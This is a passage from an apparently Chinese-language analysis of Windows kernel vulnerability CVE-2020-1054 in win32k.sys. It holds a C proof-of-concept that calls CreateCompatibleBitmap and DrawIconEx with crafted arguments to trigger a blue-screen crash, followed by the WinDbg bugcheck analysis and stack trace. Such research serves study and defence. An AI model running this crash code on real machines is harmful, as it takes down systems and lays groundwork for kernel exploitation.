VOID POC_CVE_2020_1054()
{
LoadLibrary("user32.dll");
HDC r0 = CreateCompatibleDC(0x0);
// CPR's original crash code called CreateCompatibleBitmap as follows
// HBITMAP r1 = CreateCompatibleBitmap(r0, 0x9f42, 0xa);
// however all following calculations/reversing in this blog will
// generally use the below call, unless stated otherwise
// this only matters if you happen to be following along with WinDbg
HBITMAP r1 = CreateCompatibleBitmap(r0, 0x51500, 0x100);
SelectObject(r0, r1);
DrawIconEx(r0, 0x0, 0x0, (HICON)0x30000010003, 0x0, 0xfffffffffebffffc,
0x0, 0x0, 0x6);
}
HBITMAP CreateCompatibleBitmap(HDC hdc,
int nWidth,
int nHeight);
漏洞触发函数则是DrawIconEx,该函数用于在指定的设备上下文中绘制图像,该函数定义如下:
BOOL WINAPI DrawIconEx(HDC hdc,
int xLeft,
int yTop,
HICON hIcon,
int cxWidth,
int cyWidth,
UINT istepIfAniCur,
HBRUSH hbrFlickerFreeDraw,
UINT diFlags);
编译运行POC,系统就会产生BSOD错误,以下的部分错误信息:
0: kd> !analyze -v
Connected to Windows 7 7601 x64 target at (Tue Jul 12 10:00:11.147 2022 (UTC + 8:00)), ptr64 TRUE
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: fffff906c5000238, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff9600011218a, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 0000000000000005, (reserved)
Debugging Details:
------------------
IMAGE_NAME: win32k.sys
TRAP_FRAME: fffff88005386a40 -- (.trap 0xfffff88005386a40)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=fffff900c5000000 rbx=0000000000000000 rcx=fffff906c5000238
rdx=fffff900c06f7fa0 rsi=0000000000000000 rdi=0000000000000000
rip=fffff9600011218a rsp=fffff88005386bd0 rbp=0000000000000000
r8=0000000000000020 r9=fffff96000070000 r10=fffff88005386c30
r11=0000000000000000 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po cy
win32k!vStrWrite01+0x36a:
fffff960`0011218a 418b36 mov esi,dword ptr [r14] ds:00000000`00000000=????????
STACK_TEXT:
nt!RtlpBreakWithStatusInstruction
nt!KiBugCheckDebugBreak+0x12
nt!KeBugCheck2+0x71e
nt!KeBugCheckEx+0x104
nt! ?? ::FNODOBFM::`string'+0x44891
nt!KiPageFault+0x16e
win32k!vStrWrite01+0x36a
win32k!EngStretchBltNew+0x164a
win32k!EngStretchBlt+0x797
win32k!EngStretchBltROP+0x5fe
win32k!BLTRECORD::bStretch+0x623
win32k!GreStretchBltInternal+0xa37
win32k!BltIcon+0x18f
win32k!DrawIconEx+0x3b1
win32k!NtUserDrawIconEx+0x14d
nt!KiSystemServiceCopyEnd+0x13
USER32!NtUserDrawIconEx+0xa
USER32!DrawIconEx+0xd9